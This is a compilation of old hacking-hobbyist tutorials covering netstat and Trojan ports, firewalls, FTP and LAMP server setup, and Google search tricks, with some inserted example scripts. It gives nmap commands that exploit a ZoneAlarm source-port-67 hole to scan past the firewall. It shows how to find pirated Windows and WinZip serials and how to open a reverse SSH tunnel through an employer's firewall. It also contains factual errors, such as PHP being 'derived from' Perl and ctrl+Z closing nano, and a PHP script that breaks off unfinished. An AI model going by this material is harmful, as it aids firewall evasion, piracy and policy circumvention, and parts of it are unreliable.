Change The Default Location For Installing Apps
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Run the Registry Editor (regedit) and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Look for the value named ProgramFilesDir. By default, this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
Closing Open Holes: System Security, or How to Close Open Holes
This manual discusses methods of system security analysis and explains how to secure your system, whether it is standalone or connected to a LAN.
Open Ports: A Threat to Security?
In the Netstat Tutorial we discussed how the netstat -a command shows the list of open ports on your system. Before I move on, I would like to quickly recap the important part. So here goes, straight from the netstat tutorial:
Now, the '-a' option is used to display all open connections on the local machine. It also returns the remote system to which we are connected, the port numbers of the remote system (and of the local machine) used by the connection, and also the type and state of the connection we have with the remote system.
For Example,
C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
TCP ankit:1036 dwarf.box.sk:ftp-data TIME_WAIT
TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2
TCP ankit:1045 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1052 zztop.boxnetwork.net:80 ESTABLISHED
TCP ankit:1053 mail2.mtnl.net.in:pop3 TIME_WAIT
UDP ankit:1025 *:*
UDP ankit:nbdatagram *:*
Now, let us take a single line from the above output and see what it stands for:
Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
Now, the above can be arranged as below:
Protocol: TCP (This can be Transmission Control Protocol or TCP, User Datagram Protocol or UDP or sometimes even, IP or Internet Protocol.)
Local System Name: ankit (This is the name of the local system that you set during the Windows setup.)
Local Port opened and being used by this connection: 1031
Remote System: dwarf.box.sk (This is the non-numerical form of the system to which we are connected.)
Remote Port: ftp (This is the port number of the remote system dwarf.box.sk to which we are connected.)
State of Connection: ESTABLISHED
'Netstat' with the '-a' argument is normally used to get a list of open ports on your own system, i.e. on the local system. This can be particularly useful to check whether your system has a Trojan installed or not. Yes, most good antivirus software is able to detect the presence of Trojans, but we are hackers and need no software to tell us whether we are infected or not. Besides, it is more fun to do something manually than to simply click on the 'Scan' button and let some software do it.
The following is a list of Trojans and the port numbers they use. If you run netstat on your own system and find any of the following open, then you can be pretty sure that you are infected.
Port 12345(TCP) Netbus
Port 31337(UDP) Back Orifice
For complete list, refer to the Tutorial on Trojans at: hackingtruths.box.sk/trojans.txt
----
Now, the above tutorial resulted in a number of people raising questions like: If the 'netstat -a' command shows open ports on my system, does this mean that anyone can connect to them? Or, how can I close these open ports? How do I know if an open port is a threat to my system's security or not? Well, the answer to all these questions will be clear once you read the paragraphs below:
Now, the thing to understand here is that, Port numbers are divided into three ranges:
The Well Known Ports are those from 0 through 1023. This range of ports is bound to the services running on them. By this I mean that each port usually has a specific service running on it. There is an internationally accepted port-number-to-service assignment (refer to RFC 1700) which specifies on what port number a particular service runs. For example, by default FTP runs on Port 21. So if you find that Port 21 is open on a particular system, then it usually means that that system uses the FTP protocol to transfer files. However, please note that some smart system administrators deliberately run fake services on popular ports to fool lamers. For example, a system might be running a fake FTP daemon on Port 21. Although you get the same interface as the real FTP daemon (banner, response numbers etc.), it might actually be software logging your presence and sometimes even tracing you!
The Registered Ports are those from 1024 through 49151. This range of port numbers is not bound to any specific service. Networking utilities like your browser, email client or FTP software open a random port within this range and start a communication with the remote server. A port number within this range is the reason why you are able to surf the net or check your email.
If you find that when you give the netstat -a command a number of ports within this range are open, then you should probably not worry. These ports are simply opened so that your software applications can do what you want them to do. They are opened temporarily by various applications to perform tasks and act as a buffer transferring packets (data) received to the application and vice versa. Once you close the application, you find that these ports are closed automatically. For example, when you type www.hotmail.com in your browser, your browser randomly chooses a Registered Port and uses it as a buffer to communicate with the various remote servers involved.
The Dynamic and/or Private Ports are those from 49152 through 65535. This range is rarely used, and is mostly used by Trojans; however, some applications do tend to use such high port numbers. For example, Sun starts their RPC ports at 32768.
So this basically brings us to what to do if you find that Netstat gives you a couple of open ports on your system:
1. Check the Trojan port list and see if the open port matches any of the popular ones. If it does, then get a Trojan remover and remove the Trojan.
2. If it doesn't, or if the Trojan remover says 'No trojan found', then see if the open port lies in the Registered Ports range. If yes, then you have nothing to worry about, so forget about it.
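As an added example (not part of the original tutorial), the following Python script applies the two checks above to constructed netstat -a output modelled on the listing earlier in the text: each local port is first looked up in the Trojan list quoted on this page (Netbus on TCP 12345, Back Orifice on UDP 31337) and then classified by the three port ranges described. The service-name table and the extra LISTENING and UDP lines in the sample are assumptions added for the demonstration.

```python
"""Added example (not from the tutorial): apply the two checks above to
Windows 'netstat -a' output. Each local port is first looked up in the
Trojan port list quoted on this page, then classified by the IANA ranges
described in the text."""
import re
from collections import Counter

# Trojan ports named on this page. Extend from the full Trojan list if
# you have it; nothing beyond these two is assumed here.
TROJAN_PORTS = {
    ("TCP", 12345): "Netbus",
    ("UDP", 31337): "Back Orifice",
}

# netstat prints well-known service names instead of numbers. Assumed
# mapping for the names used in the sample (matches /etc/services).
SERVICE_NAMES = {"ftp": 21, "ftp-data": 20, "pop3": 110, "nbdatagram": 138}

# Constructed sample modelled on the listing above, with a LISTENING TCP
# socket and an extra UDP socket added to exercise the Trojan check.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address         State
  TCP    ankit:1031             dwarf.box.sk:ftp        ESTABLISHED
  TCP    ankit:1036             dwarf.box.sk:ftp-data   TIME_WAIT
  TCP    ankit:1043             banners.egroups.com:80  FIN_WAIT_2
  TCP    ankit:1045             mail2.mtnl.net.in:pop3  TIME_WAIT
  TCP    ankit:12345            0.0.0.0:0               LISTENING
  UDP    ankit:1025             *:*
  UDP    ankit:nbdatagram       *:*
  UDP    ankit:31337            *:*
"""

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def port_range(port):
    """The three IANA ranges exactly as the text divides them."""
    if 0 <= port <= 1023:
        return "well-known"
    if 1024 <= port <= 49151:
        return "registered"
    if 49152 <= port <= 65535:
        return "dynamic/private"
    raise ValueError(f"port out of range: {port}")


def parse_port(endpoint):
    """'ankit:1031' -> 1031, 'dwarf.box.sk:ftp' -> 21, '*:*' -> None."""
    _, _, port = endpoint.rpartition(":")
    if port in ("*", ""):
        return None
    return int(port) if port.isdigit() else SERVICE_NAMES[port]


def parse_netstat(text):
    """Yield one dict per socket line; header and blank lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state = m.groups()
        yield {
            "proto": proto,
            "local_port": parse_port(local),
            "foreign": foreign,
            "state": state or "",
        }


def flag_trojans(text):
    """Step 1 of the text: list (proto, port, name) for every Trojan port seen."""
    hits = []
    for sock in parse_netstat(text):
        name = TROJAN_PORTS.get((sock["proto"], sock["local_port"]))
        if name:
            hits.append((sock["proto"], sock["local_port"], name))
    return hits


def summarize_ranges(text):
    """Step 2 of the text: how many local ports fall in each IANA range."""
    return Counter(port_range(s["local_port"]) for s in parse_netstat(text))


if __name__ == "__main__":
    for proto, port, name in flag_trojans(SAMPLE_NETSTAT):
        print(f"WARNING: {proto} port {port} open - known {name} port")
    print(dict(summarize_ranges(SAMPLE_NETSTAT)))
```

Note that Back Orifice's port 31337 sits in the Registered range, which is why the text puts the Trojan-list check before the range check.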
***********************
HACKING TRUTH: A common technique employed by a number of system administrators, is remapping ports. For example, normally the default port for HTTP is 80. However, the system administrator could also remap it to Port 8080. Now, if that is the case, then the homepage hosted at that server would be at:
http://domain.com:8080 instead of
http://domain.com:80
The idea behind port remapping is that instead of running a service on a well known port, where it can easily be exploited, it is better to run it on a less well known port, as the hacker would find it more difficult to find that service. He would have to port scan a high range of numbers to discover the remapping.
The ports used for remapping are usually pretty easy to remember. They are chosen keeping in mind the default port number at which the service being remapped should be running. For example, POP by default runs on Port 110. However, if you were to remap it, you would choose any of the following: 1010, 11000, 1111 etc.
Some sysadmins also like to choose port numbers in the following manner: 1234, 2345, 3456, 4567 and so on. Yet another reason why port remapping is done is that on a Unix system, to be able to listen on a port under 1024, you must have root privileges.
************************
Firewalls
Use of firewalls is no longer confined to servers, websites or commercial companies. Even if you simply dial up to your ISP or use PPP (Point to Point Protocol) to surf the net, you simply cannot do without a firewall. So what exactly is a firewall?
Well, in non-geek language, a firewall is basically a shield which protects your system from the untrusted, non-reliable systems connected to the Internet. It is software which listens on all ports of your system for any attempt to open a connection, and when it detects such an attempt, it reacts according to a predefined set of rules. So basically, a firewall is something that protects the network (or system) from the Internet. The name is derived from the firewalls used in vehicles: a barrier made of fire-resistant material protecting the vehicle in case of fire.
Now, for a better 'according to the bible' definition of a firewall: a firewall is best described as a software, hardware, or combined hardware-and-software packet filter that allows only selected packets to pass through from the Internet to your private internal network. A firewall is a system or a group of systems which guards a trusted network (the internal private network) from the untrusted network (the Internet).
NOTE: This was a very brief description of what a firewall is; I will not be going into the details of their working in this manual.
Anyway, the term 'firewall' (which generally referred to devices used by companies for commercial purposes) has evolved into a new term, 'personal firewall'. This term is used to refer to firewalls installed on a standalone system which may or may not be networked, i.e. one that usually just connects to an ISP. In other words, a personal firewall is a firewall used for personal use.
Now that you have a basic description of what a firewall is, let us move on to why exactly you need to install a firewall. Or, how can not installing a firewall pose a threat to the security of your system?
You see, when you are connected to the Internet, then you have millions of other untrusted systems connected to it as well. If somehow someone found out your IP address, then they could do probably anything to your system. They could exploit any vulnerability existing in your system, damage your data, and even use your system to hack into other computers.
Finding out someone's IP address is not very difficult. Anybody can find out your IP through various chat services, instant messengers (ICQ, MSN, AOL etc.), through a common ISP and numerous other ways. In fact, finding out the IP address of a specific person is not always the priority of some hackers.
What I mean by that is that there are a number of scripts and utilities available which scan all IP addresses in a certain range for predefined common vulnerabilities, for example systems with file sharing enabled, or a system running an OS which is vulnerable to the Ping of Death attack. As soon as a vulnerable system is found, they use the IP to carry out the attacks.
The most common scanners look for systems with RAT's or Remote Administration Tools installed. They send a packet to common Trojan ports and display whether the victim's system has that Trojan installed or not. The 'Scan Range of IP Addresses' that these programs accept are quite wide and one can easily find a vulnerable system in the matter of minutes or even seconds.
Trojan horses like Back Orifice provide remote access to your system and can set up a password sniffer. The combination of a back door and a sniffer is a dangerous one: the back door provides future remote access, while the sniffer may reveal important information about you like your other passwords, bank details, credit card numbers, social security number etc. If your home system is connected to a local LAN and the attacker manages to install a backdoor on it, then you have probably given the attacker the same level of access to your internal network as you have. This would also mean that you have created a back door into your network that bypasses any firewall that may be guarding the front door.
You may argue with me that as you are using a dial up link to your ISP via PPP, the attacker would be able to access your machine only when you are online. Well, yes that is true, however, not completely true. Yes, it does make access to your system when you reconnect, difficult, as you have a dynamic Internet Protocol Address. But, although this provides a faint hope of protection, routine scanning of the range of IP's in which your IP lies, will more often than not reveal your current Dynamic IP and the back door will provide access to your system.
*******************
HACKING TRUTH: Microsoft says: War Dialer programs automatically scan for modems by trying every phone number within an exchange. If the modem can only be used for dial-out connections, a War Dialer won't discover it. However, PPP changes the equation, as it provides bidirectional transport, making any connected system visible to scanners and attackers.
*******************
So how do I protect myself from such scans and unsolicited attacks? Well, this is where personal firewalls come in. Just like their name suggests, they protect you from unsolicited connection probes, scans and attacks.
They listen on all ports for any connection requests received (from both legitimate and fake hosts) and sent (by applications like your browser, email client etc.). As soon as such an instance is recorded, the firewall pops up a warning asking you whether to allow the connection to initiate or not. This warning message also contains the IP which is trying to initiate the connection and the port number to which it is trying to connect, i.e. the port to which the packet was sent. It also protects your system from port scans, DoS attacks, vulnerability attacks etc. So basically it acts as a shield or a buffer which does not allow your system to communicate with untrusted systems directly.
Most Personal Firewalls have extensive logging facilities which allows you to track down the attackers. Some popular firewalls are:
1. BlackICE Defender: An IDS for PCs. It's available at http://www.networkice.com.
2. ZoneAlarm: The easiest to setup and manage firewall. Get it for free at: www.zonelabs.com
Once you have installed a firewall on your system, you will often get a number of warnings which might make it seem as if someone is trying to break into your system; however, they are actually bogus messages, caused either by your OS itself or by the process called allocation of dynamic IPs. For a detailed description of these two, read on.
Many people complain that as soon as they dial into their ISP, their firewall says that such and such IP is probing Port X. What causes them?
Well, this is quite common. The cause is that somebody hung up just before you dialed in and your ISP assigned you the same IP address. You are now seeing the remains of communication with the previous person. This is most common when the person to which the IP was assigned earlier was using ICQ or chat programs, was connected to a Game Server or simply turned off his modem before his communication with remote servers was complete.
You might even get a message like: Such and such IP is trying to initiate a NetBIOS session on Port X. This again is extremely common. The following is an explanation of why it happens, which I picked up a couple of days ago: NetBIOS requests to UDP port 137 are the most common item you will see in your firewall reject logs. This comes about from a feature in Microsoft's Windows: when a program resolves an IP address into a name, it may send a NetBIOS query to that IP address. This is part of the background radiation of the Internet, and is nothing to be concerned about.
What Causes them? On virtually all systems (UNIX, Macintosh, Windows), programs call the function 'gethostbyaddr()' with the desired address. This function will then do the appropriate lookup, and return the name. This function is part of the sockets API. The key thing to remember about gethostbyaddr() is that it is virtual. It doesn't specify how it resolves an address into a name. In practice, it will use all available mechanisms. If we look at UNIX, Windows, and Macintosh systems, we see the following techniques:
DNS in-addr.arpa PTR queries sent to the DNS server
NetBIOS NodeStatus queries sent to the IP address
lookups in the /etc/hosts file
AppleTalk over IP name query sent to the IP address
RPC query sent to the UNIX NIS server
NetBIOS lookup sent to the WINS server
Windows systems do the /etc/hosts, DNS, WINS, and NodeStatus techniques. In more excruciating detail, Microsoft has a generic system component called a naming service. All the protocol stacks in the system (NetBIOS, TCP/IP, Novell IPX, AppleTalk, Banyan, etc.) register the kinds of name resolutions they can perform. Some RPC products will likewise register an NIS naming service. When a program requests to resolve an address, this address gets passed on to the generic naming service. Windows will try each registered name resolution subsystem sequentially until it gets an answer.
(Side note: Users sometimes complain that accessing Windows servers is slow. This is caused by installing unneeded protocol stacks that must time out first before the real protocol stack is queried for the server name.)
The order in which it performs these resolution steps for IP addresses can be configured under the Windows registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider.
Breaking Through Firewalls
Although firewalls are meant to provide you complete protection from port scan probes etc., there are several holes in popular firewalls waiting to be exploited. In this issue, I will discuss a hole in ZoneAlarm Version 2.1.10 to 2.0.26, which allows the attacker to port scan the target system (although normally it should stop such scans).
If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the packet through and will not notify the user. This means that one can TCP or UDP port scan a ZoneAlarm-protected computer as if there were no firewall there, IF one uses port 67 as the source port on the packets.
Exploit:
UDP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sU 192.168.128.88
(Notice the -g67 which specifies source port).
TCP Scan:
You can use NMap to port scan the host with the following command line:
nmap -g67 -P0 -p130-140 -sS 192.168.128.88
(Notice the -g67 which specifies source port).
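As an added example written from the defender's side (not from the original text or from ZoneAlarm), this Python snippet scans a packet log for the pattern described above: packets arriving with source port 67 that are not DHCP replies, grouped by sender and counted by distinct destination port, since a spread of ports from one sender is a sweep rather than noise. The log format and every line in it are constructed for the demonstration; a real firewall's log would need its own parser.

```python
"""Added example, written from the defender's side (not from the text or
from ZoneAlarm): find probes that hide behind source port 67 in a packet
log. The log format and every line below are constructed for the demo;
a real firewall's log needs its own parser."""
import re
from collections import defaultdict

# Constructed log: one DHCP reply, one normal web connection, a sweep of
# UDP ports 130-133 and TCP ports 135/139 from source port 67, and one
# unrelated dropped probe.
SAMPLE_LOG = """\
10:00:01 UDP 198.51.100.1:67 -> 192.168.128.88:68 ALLOW
10:00:05 TCP 192.168.128.88:1043 -> 203.0.113.50:80 ALLOW
10:01:10 UDP 203.0.113.9:67 -> 192.168.128.88:130 ALLOW
10:01:10 UDP 203.0.113.9:67 -> 192.168.128.88:131 ALLOW
10:01:11 UDP 203.0.113.9:67 -> 192.168.128.88:132 ALLOW
10:01:11 UDP 203.0.113.9:67 -> 192.168.128.88:133 ALLOW
10:01:12 TCP 203.0.113.9:67 -> 192.168.128.88:135 ALLOW
10:01:12 TCP 203.0.113.9:67 -> 192.168.128.88:139 ALLOW
10:02:00 TCP 203.0.113.77:4455 -> 192.168.128.88:139 DROP
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<sip>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dip>[\d.]+):(?P<dport>\d+)\s+(?P<action>\w+)$"
)


def is_expected_dhcp(proto, dport):
    """Port 67 is the DHCP server port. On a client the only legitimate
    traffic from it is UDP to port 68 (or to 67 if this host relays DHCP);
    a TCP packet with source port 67 has no normal reason to arrive."""
    return proto == "UDP" and dport in (67, 68)


def parse_log(text):
    """Yield one dict per well-formed log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            pkt = m.groupdict()
            pkt["sport"], pkt["dport"] = int(pkt["sport"]), int(pkt["dport"])
            yield pkt


def find_source_port_67_scans(text, min_ports=3):
    """Group non-DHCP packets with source port 67 by (sender, protocol) and
    report senders that touched at least min_ports distinct destination
    ports: a single stray packet is noise, a spread of ports is a sweep."""
    touched = defaultdict(set)
    for pkt in parse_log(text):
        if pkt["sport"] != 67 or is_expected_dhcp(pkt["proto"], pkt["dport"]):
            continue
        touched[(pkt["sip"], pkt["proto"])].add(pkt["dport"])
    return {key: sorted(ports) for key, ports in touched.items()
            if len(ports) >= min_ports}


if __name__ == "__main__":
    for (sip, proto), ports in find_source_port_67_scans(SAMPLE_LOG).items():
        print(f"{sip} swept {proto} ports {ports} from source port 67")
```

The same grouping works for any other "trusted" source port a filter whitelists; only the is_expected_dhcp() rule is specific to port 67.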
Create An Ftp Server On Your Pc With Serv-u
Serv-U
No-IP.com Website
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it's easier to keep up-to-date. Imagine having to change all of your settings every time your IP changed. With No-IP, the No-IP service runs in the background on your computer and updates your current IP address with your FTP server's URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don't want your IP address posted out there for everyone to see.
1. Go to www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.
You now have a static web address.
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user cannot go any further up than his home directory. Click next.
11. The account is now set so click finish.
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
13. Try logging on with the username and password and see if it works.
Easily Find Serial Numbers On Google
in the search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
just try it out, it's very quick and it works nicely..
How To Find Ftp's The Easy Way
The easiest search quote is "index of ..."
Some kind of examples are:
index of ftp/ +mp3
index of ftp/ +divx
index of ftp/ +"whateveryouwant"
Google has many operators that should help you to specify your search
USE EM
There are also lots of advanced operators available
here are a few:
cache:
link:
related:
info:
stocks:
site:
allintitle:
intitle:
allinurl:
inurl:
eg:
allintitle: "index of ftp/mp3"
try to combine things and maybe you'll find something
HowTo: Create a Reverse SSH Tunnel
Posted on: Jun 20, 2008 at 08:06am
Section: Tutorials
There are times in your life that you may find yourself in need of accessing some files on your office computer from home, but unable to due to your company employing a firewall to protect their network from hackers. Since a snowball has a better chance of surviving in hell than you do of getting your network administrator to open a port in the firewall so you can SSH into your work computer from home, you're going to need to come up with another way to get access to your machine. This is where a Reverse SSH Tunnel will come in handy. The command to do this is extremely simple. From your work computer, type the following:
ssh -l username -nNT -R 1100:172.16.42.80:22 12.24.79.186
That's it. Just replace each of the items in that command (username, the two ports, the two IP addresses) with the appropriate local values and you're all set. Now, before I leave you totally confused as to what each of these do, let me break this down so you understand it better.
Username - Obviously this is your non-root user at home. So if you login to your BSD or Linux box with the username "bobwhite", you'd replace "username" above with "bobwhite".
1100: - This will be the local port on your home computer you will connect to. I'll explain more how to use this later. But you'll want to make sure it's a port other than what you have SSH listening on. SSH normally listens on port 22, but if you've moved it to say, port 300, then you won't want this port ID to be 300. 1100 is a pretty good number so you can be sure not to step on the toes of any other services running.
172.16.42.80:22 - This is the ip address and local port on your work computer. So if your work computer has the IP address of 172.16.42.80, then you'd enter that there. Or for example, if your IP was 10.0.23.56, you'd use that instead. Now as a side note, you can use your work computer as a middleman for connecting to another machine inside the firewall rather than your own. By changing the IP and port number to the one used by the machine of choice you'd rather connect to, you will be able to ssh into that other machine from home without first having to stop at your own machine. The kicker is, if you want to get into your machine later on, you'll either need to restart the ssh session on your work computer, or ssh back to it from the machine you got forwarded to.
12.24.79.186 - This will be the IP address of your workstation or server at home you're connecting into.
Well, that's pretty much it. There are two additional commands you'll need to use if you're, A) connecting to your machine at home through a port other than 22, and/or B) if you're using an SSH static public/private key. To do either of these, you'll need to add the following options to your ssh command line:
-p 300 - The "-p" tells SSH that you want to specify a port. 300 is of course an example of whatever your home ssh server listens on.
-i id_dsa - The "-i" command tells SSH that you want to use an "identity" file (aka a public/private keypair) to connect to the remote server rather than an automatically generated one. This is important if you've setup your sshd_config file similar to the configuration shown here.
Once the connection is established from your work computer, you should be able to connect from home anytime you want. Just remember two things. The first is to consider using AutoSSH to keep the connection alive in case it should drop, and the second is that you've technically just opened a hole through the firewall and into your network for the world to exploit. Now the likelihood of someone exploiting it is very slim to none, but there's still that chance, so don't get all willy-nilly with it when you use it. Only use it on nights when you expect to have a need to connect to your machine and shut it off during the day while you're at work.
Also, another note of interest. When you start the session, you'll need to do one of three things. Leave the console window open with the session running, do the command and follow it with an & sign to allow the process to become separated from the console so that it can allow you to do other things while it's running (you'll still need to keep the console window open when you're done or it'll kill the session), or start a screen session and start this process in there and then detach the screen session to leave it running.
And one other thing, when the command starts, you won't get any feedback that it's running. At most you'll be asked for your passkey for your public key file, or your login credentials. After that it will act like a hung process that's not doing anything, but actually it's fine. To test your tunnel, just open a second console window and ssh to your home computer. Once in, ssh to localhost and port 1100 (or whatever port you chose) and login to your work computer. If you did it right, you should now find yourself ssh'ed into your work PC.
From home all you'll need to do is ssh either to localhost (if you're on the same machine your work PC is ssh'ed into) or the IP of the machine you connected to from work on the IP you specified and you will be able to login to your machine at work. It's just that simple. You're essentially riding an existing ssh session backwards to your computer at work.
Show apps that use internet connection at the moment
2. $ lsof -P -i -n
3. $ ss -p
a. ss -p | cat
b. ss -p | grep STA
c. ss -p | cut -f2 -sd\"
d. ss -p | grep STA | cut -f2 -d\"
4. $ netstat -lantp | grep -i stab | awk -F/ '{print $2}' | sort | uniq
5. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | sort | uniq
6. $ netstat -lantp | grep -i establ | awk -F/ '{print $2}' | uniq | sort
Food for thought.
How to install, configure and work a LAMP stack with FTP access
First off I will talk about what exactly a LAMP stack is.
LAMP stands for Linux, Apache, MySQL, PHP (the P can sometimes be replaced with Python). Let's break this down.
Linux- Linux/ Unix is the leading OS for web servers due to low resource usage allowing for faster load times and high up-time.
Apache- Apache is the actual service that Hosts the website and turns your box into a usable webhost.
MySQL- is a dynamic database that is able to hold almost any information. This stores information that is then pulled by PHP or another server side language.
PHP- A high-powered dynamic internet language derived from the GPL (General Programming Language) Perl. This is used to display dynamic content.
Now that we have a brief understanding of what exactly we are doing we will now be able to begin.
Before I get started as to how to do everything I would like to mention I am running Ubuntu Server Edition 7.04 (32 bit). I am also assuming you have basic understanding of Linux/ Unix along with general computing knowledge.
Once logged on to our Linux box we will need to download and install our Apache server, surprisingly enough it is incredibly simple. Just type:
sudo apt-get install apache2 mysql-server php5 libapache2-mod-php5 php5-xsl php5-gd php-pear libapache2-mod-auth-mysql php5-mysql
This will take a few moments to install and download.
Once that is up and working we will restart the LAMP server by using:
sudo /etc/init.d/apache2 restart
Now let's make it work! We will configure Apache by using a simple Linux text editor called nano. (I am using nano in this tutorial instead of vi because nano is simpler for a beginner.) Unlike so many other services, you do not need to directly edit the main Apache config file. Before we move on we will need to make a new directory, so type in the following:
sudo mkdir /home/[username here]/www/
sudo chmod 755 /home/[username here]/www/
With that made lets do some small bits of configuring. We will use our nano editor to edit our sites available list by running the following:
sudo cp /etc/apache2/sites-available/default /etc/apache2/sites-available/mysite
sudo nano /etc/apache2/sites-available/mysite
That bit there copies the file “default” and renames it “mysite” and the second line opens it for editing. Here is what we need to change:
Change this:
DocumentRoot /var/www
Options FollowSymLinks
AllowOverride None
To:
DocumentRoot /home/[username here]/www
Options FollowSymLinks
AllowOverride None
Now hit ctrl + O to save. Then ctrl + Z to close the file.
Next we use a pretty little Linux trick that disables the "default" site and enables "mysite":
sudo a2dissite default && sudo a2ensite mysite
And finally you will need to restart your Apache server just as we did before.
SO! Let's test it out! We will need to give our new web server something to display, so let's keep it simple with the following command:
echo 'Hello! It is working!' > /home/[username here]/www/index.html
Done that? GREAT!
Now let's take a look: open up a web browser and type in the internal address of that machine (if you are testing this on the same machine it is installed on, the loopback address for localhost is 127.0.0.1).
So as a URL you would type http://address-of-machine. As an example, mine was http://192.168.1.67
If it works you should see the message “Hello! It is working!”
Let's advance a little bit though. This is all fine and dandy if you are on a LAN with this machine, but what about over the World Wide Web? Well, Apache is automatically listening on port 80; unfortunately most ISPs HATE people using this port, so I will show you how to change the listen port of the server. Simply use nano to change the Apache port list:
sudo nano /etc/apache2/ports.conf
It will by default say
Listen 80
Listen 443
change this to:
Listen 8000
Listen 443
Perfect! Now, after you restart the Apache service once more, we will be listening on an unrestricted port! The only thing that has changed is the way we access the web page. Instead of typing http://192.168.1.67 we now type http://192.168.1.67:8000
Log into your router, forward port 8000 to the internal address of the LAMP stack, and we are good to go.
You now have a fully functional LAMP stack that will host anything just as a paid host will (it won't have a domain name, as you need to set that up yourself, which will not be covered in this tutorial).
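As a post-install check, here is an added example of my own (not part of the original tutorial): a PHP page that reports whether the stack ended up configured the way the steps above intend. It assumes the DocumentRoot and port chosen above; drop it into the www directory as check.php, load it once, then delete it.

```php
<?php
// Added example, not from the original tutorial. Reports the settings that matter
// for a freshly built LAMP stack. The expected root and port are the ones chosen
// in the steps above and are assumptions about this particular setup.

function stackReport(string $expectedRoot, int $expectedPort): array
{
    $findings = [];

    // Apache really serves from the directory set in sites-available/mysite.
    $root = rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/');
    $findings['document_root'] = ($root === rtrim($expectedRoot, '/'))
        ? "ok ($root)" : "unexpected ($root)";

    // The Listen change in ports.conf took effect.
    $port = (int) ($_SERVER['SERVER_PORT'] ?? 0);
    $findings['listen_port'] = ($port === $expectedPort)
        ? "ok ($port)" : "unexpected ($port)";

    // The www directory was chmod 755 and owned by the shell user, so the account
    // PHP runs as (www-data) should NOT be able to write into it; if it can, any
    // bug in a script is enough to rewrite the site.
    $findings['webroot_writable_by_php'] = is_writable(__DIR__)
        ? 'yes (tighten ownership/permissions)' : 'no (good)';

    // The php5-mysql package installed above should expose at least one of these.
    foreach (['mysql', 'mysqli', 'pdo_mysql'] as $ext) {
        $findings["ext_$ext"] = extension_loaded($ext) ? 'loaded' : 'absent';
    }

    // php.ini switches that should all be off on a server reachable from the
    // Internet (register_globals and magic quotes are revisited later on this page).
    foreach (['register_globals', 'magic_quotes_gpc', 'display_errors',
              'expose_php', 'allow_url_include'] as $key) {
        $have = ini_get($key);
        if ($have === false || $have === '') {
            $findings["ini_$key"] = 'off or not present (good)';
        } else {
            $findings["ini_$key"] = filter_var($have, FILTER_VALIDATE_BOOLEAN)
                ? "on (turn off; currently \"$have\")" : 'off (good)';
        }
    }
    return $findings;
}

// Plain-text output so it reads the same in a browser or with curl.
header('Content-Type: text/plain');
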